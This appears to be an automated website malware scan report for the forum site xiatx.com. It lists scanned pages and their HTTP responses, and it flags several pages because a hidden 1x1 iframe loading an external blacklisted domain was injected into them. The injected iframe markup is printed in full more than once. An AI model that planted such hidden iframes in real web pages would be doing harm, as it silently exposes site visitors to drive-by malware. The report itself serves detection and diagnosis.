Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xiatx.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.xiatx.com/ | 200 OK Content-Length: 78900 Content-Type: text/html | malicious |
Page code contains blacklisted domain: zief.pl ...[4078 bytes skipped]... owTopLink(); });checkBlind();</script> <div id="discuz_tips" style="display:none;"></div> <script type="text/javascript"> var tipsinfo = '30775159|X3.1|0.6||0||0|7|1412502704|9f653765c32b741de0531c30d7bd57d5|2'; </script> <script src="http://discuz.gtimg.cn/cloud/scripts/discuz_tips.js?v=1" type="text/javascript" charset="UTF-8"></script><iframe src="http://zief.pl/rc/" width=1 height=1 style="border:0"></iframe> </body> </html> Malicious iFrame found. The same iFrame was found in 18 websites. size: 1x1 src: http://zief.pl/rc/ This URL is marked by Google as suspicious <iframe src="http://zief.pl/rc/" width=1 height=1 style="border:0"> | ||
http://www.xiatx.com/static/js/common.js?cVZ | 200 OK Content-Length: 69459 Content-Type: application/x-javascript | clean |
http://www.xiatx.com/static/js/portal.js?cVZ | 200 OK Content-Length: 11314 Content-Type: application/x-javascript | clean |
http://www.xiatx.com/static/js/logging.js?cVZ | 200 OK Content-Length: 603 Content-Type: application/x-javascript | clean |
http://tcss.qq.com/ping.js?v=1VERHASH | 200 OK Content-Length: 8909 Content-Type: application/x-javascript | clean |
http://www.xiatx.com/home.php?mod=misc&ac=sendmail&rand=1412502704 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://discuz.gtimg.cn/cloud/scripts/discuz_tips.js?v=1 | 200 OK Content-Length: 6173 Content-Type: application/x-javascript | clean |
http://www.xiatx.com/member.php?mod=register | 200 OK Content-Length: 20130 Content-Type: text/html | malicious |
Page code contains blacklisted domain: zief.pl ...[4074 bytes skipped]... owTopLink(); });checkBlind();</script> <div id="discuz_tips" style="display:none;"></div> <script type="text/javascript"> var tipsinfo = '30775159|X3.1|0.6||0||0|7|1412502716|b6ba3f84c7576718a08de46447fd07b8|2'; </script> <script src="http://discuz.gtimg.cn/cloud/scripts/discuz_tips.js?v=1" type="text/javascript" charset="UTF-8"></script><iframe src="http://zief.pl/rc/" width=1 height=1 style="border:0"></iframe> </body> </html> Malicious iFrame found. The same iFrame was found in 18 websites. size: 1x1 src: http://zief.pl/rc/ This URL is marked by Google as suspicious <iframe src="http://zief.pl/rc/" width=1 height=1 style="border:0"> | ||
http://www.xiatx.com/static/js/register.js?cVZ | 200 OK Content-Length: 10775 Content-Type: application/x-javascript | clean |
http://www.xiatx.com/home.php?mod=misc&ac=sendmail&rand=1412502716 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://www.xiatx.com/connect.php?mod=login&op=init&referer=http%3A%2F%2Fwww.xiatx.com%2F.%2F&statfrom=login_simple | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 05 Oct 2014 09:52:00 GMT Location: https://graph.qq.com/oauth2.0/authorize?response_type=code&client_id=310611889&redirect_uri=http%3A%2F%2Fwww.xiatx.com%2Fconnect.php%3Fmod%3Dlogin%26op%3Dcallback%26referer%3Dhttp%253A%252F%252Fwww.xiatx.com%252F.%252F&state=30507fe0020e54d6bb87576081300fac&scope=get_user_info%2Cadd_share%2Cadd_t%2Cadd_pic_t%2Cget_repost_list Server: Microsoft-IIS/6.0 Content-Type: text/html; charset=gbk Set-Cookie: VRl7_2132_saltkey=CXffY7u1; expires=Tue, 04-Nov-2014 09:52:00 GMT; path=/; httponly Set-Cookie: VRl7_2132_lastvisit=1412499120; expires=Tue, 04-Nov-2014 09:52:00 GMT; path=/ Set-Cookie: VRl7_2132_sid=Yt7P4g; expires=Mon, 06-Oct-2014 09:52:00 GMT; path=/ Set-Cookie: VRl7_2132_lastact=1412502720%09connect.php%09login; expires=Mon, 06-Oct-2014 09:52:00 GMT; path=/ Set-Cookie: VRl7_2132_stats_qc_reg=deleted; expires=Sat, 05-Oct-2013 09:51:59 GMT; path=/ Set-Cookie: VRl7_2132_cloudstatpost=deleted; expires=Sat, 05-Oct-2013 09:51:59 GMT; path=/ Set-Cookie: VRl7_2132_con_request_uri=http%3A%2F%2Fwww.xiatx.com%2Fconnect.php%3Fmod%3Dlogin%26op%3Dcallback%26referer%3Dhttp%253A%252F%252Fwww.xiatx.com%252F.%252F; path=/ X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 | clean |
https://graph.qq.com/oauth2.0/authorize?response_type=code&client_id=310611889&redirect_uri=http%3a%2f%2fwww.xiatx.com%2fconnect.php%3fmod%3dlogin%26op%3dcallback%26referer%3dhttp%253a%252f%252fwww.xiatx.com%252f.%252f&state=30507fe0020e54d6bb87576081300fac&scope=get_user_info%2cadd_share%2cadd_t%2cadd_pic_t%2cget_repost_list | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 05 Oct 2014 09:59:54 GMT Location: http://openapi.qzone.qq.com/oauth/show?which=Login&display=pc&response_type=code&client_id=310611889&redirect_uri=http%3a%2f%2fwww.xiatx.com%2fconnect.php%3fmod%3dlogin%26op%3dcallback%26referer%3dhttp%253a%252f%252fwww.xiatx.com%252f.%252f&state=30507fe0020e54d6bb87576081300fac&scope=get_user_info%2cadd_share%2cadd_t%2cadd_pic_t%2cget_repost_list Server: tws Content-Length: 0 Content-Type: text/html | clean |
http://openapi.qzone.qq.com/oauth/show?which=login&display=pc&response_type=code&client_id=310611889&redirect_uri=http%3a%2f%2fwww.xiatx.com%2fconnect.php%3fmod%3dlogin%26op%3dcallback%26referer%3dhttp%253a%252f%252fwww.xiatx.com%252f.%252f&state=30507fe0020e54d6bb87576081300fac&scope=get_user_info%2cadd_share%2cadd_t%2cadd_pic_t%2cget_repost_list | 200 OK Content-Length: 7473 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.xiatx.com ...[1851 bytes skipped]... r.userAgent].join("|_|")); var src = 'http://badjs.qq.com/cgi-bin/js_report?'+ [bid,mid,msg].join("&"); errorTransport = new Image; errorTransport.onerror = errorTransport.onload = function(){ errorTransport = errorTransport.onerror = errorTransport.onload = null ; }; errorTransport.src = src; false; Q.crtDomain = 'http://www.xiatx.com/'; Q.agree = function(){ window.isAgreed = true; }; Q.logout = function(){ window.isLogouted = true; }; Q.isNeedLogin = true; Q.getParameter = function getParameter(name) { var r = new RegExp("(\\?|#|&)" + name + "=([^&#]*)(&|#|$)"), m = location.href.match(r); return decodeURIComponent(!m ? "" : m[2]); }; Q.ptlogin2 = function(){ ...[1780 bytes skipped]... | ||
http://qzonestyle.gtimg.cn/c/=/open/connect/widget/pc/login/pt_adapt.js,qlogin_v2.js?v=20140527 | 200 OK Content-Length: 24401 Content-Type: application/x-javascript | clean |
http://www.xiatx.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.xiatx.com/forum.php | 200 OK Content-Length: 63233 Content-Type: text/html | malicious |
Page code contains blacklisted domain: zief.pl ...[4064 bytes skipped]... owTopLink(); });checkBlind();</script> <div id="discuz_tips" style="display:none;"></div> <script type="text/javascript"> var tipsinfo = '30775159|X3.1|0.6||0||0|7|1412502724|55ef8b52e72ab3e21dc4f9abba30665a|2'; </script> <script src="http://discuz.gtimg.cn/cloud/scripts/discuz_tips.js?v=1" type="text/javascript" charset="UTF-8"></script><iframe src="http://zief.pl/rc/" width=1 height=1 style="border:0"></iframe> </body> </html> Malicious iFrame found. The same iFrame was found in 18 websites. size: 1x1 src: http://zief.pl/rc/ This URL is marked by Google as suspicious <iframe src="http://zief.pl/rc/" width=1 height=1 style="border:0"> | ||
http://www.xiatx.com/static/js/forum.js?cVZ | 200 OK Content-Length: 22720 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xiatx.com
Result:
GET / HTTP/1.1
Host: xiatx.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: xiatx.com
Referer: http://www.google.com/search?q=xiatx.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: xiatx.com
Referer: http://www.google.com/search?q=xiatx.com
Result:
The result is similar to the first query. There are no suspicious redirects found.